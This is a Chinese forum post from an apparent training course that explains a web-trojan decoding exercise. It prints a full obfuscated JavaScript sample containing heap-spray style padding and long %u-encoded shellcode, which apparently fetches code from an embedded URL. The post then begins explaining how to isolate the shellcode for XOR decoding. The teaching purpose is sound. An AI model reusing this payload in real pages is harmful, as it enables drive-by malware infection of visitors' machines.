网马解密练习(三)和(四)分析
抽空看了一下大家完成网马解密练习的情况,针对练习中大家提出问题,集中来讲解一下。有的实习生对工具使用还不是很熟悉,希望多加练习,尽快熟悉工具的使用。先来看一下练习三,根据大家解密中遇到的问题来进行讲解,大家回帖中多数反馈enumxor时会报Sorry, beyond funtion. ,下面讲解如何避免出现此类问题。
练习三的代码如下:
var XXXxxyt='0';
var xxyytt='%';
var xxttyy='u';
var ttyyxx=xxyytt+xxttyy;
var ytaau='9';
var UUse=ttyyxx+ytaau+'0'+'9'+'0'+ttyyxx+'9'+'0'+'9'+XXXxxyt;
var YTavp='%u'+'BDBD'+'%u'+'BDBD'+'%u'+'BDBD'+'%u'+'BDBD'+'%u'+'BDBD'+'%u'+'BDBD'+'%u'+'BDBD'+'%u'+'BDBD'+'%u'+'EAEA';
var YTavp1='%u5858%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8%uFFFF';
var ytshell=unescape(UUse+YTavp1+'%u'+'54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1'+'%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%u'+'D5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8'+'%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u'+'7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355'+'%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%u'+'CED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4'+'%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%u'+'BDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44'+'%uBEB9%uDCE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u'+'8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD'+'%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%u'+'BCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD'+'%uD7BD%uD7BD%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%u'+'BDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909'+'%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u'+'7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD'+'%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%u'+'CB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5'+'%uFDEB%u4636%u7D8E%u668E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u'+'34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED'+'%uEDEE%uEDED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%'+'u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB'+'%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%'+'uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE'+'%u3D6D%u5585%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u'+'36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD'+'%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4136%'+'u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5'+'%u2AD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%'+'uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A'+'%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u'+'36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD'+'%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%u'+'BDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642'+'%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%u'+'ADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8'+'%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%u'+'B266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8'+'%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%u'+'E316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5'+'%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%u'+'A376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230'+'%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B'+'%u4627%uA8EE'+'%ud5db%uc9c9%u87cd%u9292%ud4c5%ud4cc%ud4d7%ude93%u92d3%u92d5%u8ecb%ud893%ud8c5%uBDBD%uBDBD'+YTavp);
var headersize=20;
var omybro=unescape(UUse);
大家可能感觉到代码很乱,无从下手,简单分析实际这个是一段shellcode,shellcode特征是已%u分隔4位一组的16进制字符串,我们先要处理一下这段代码,只留有用的shellcode部分,其余部分都可以删除。下图红色框内容都可以删除
附件:
您所在的用户组无法下载或查看附件用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
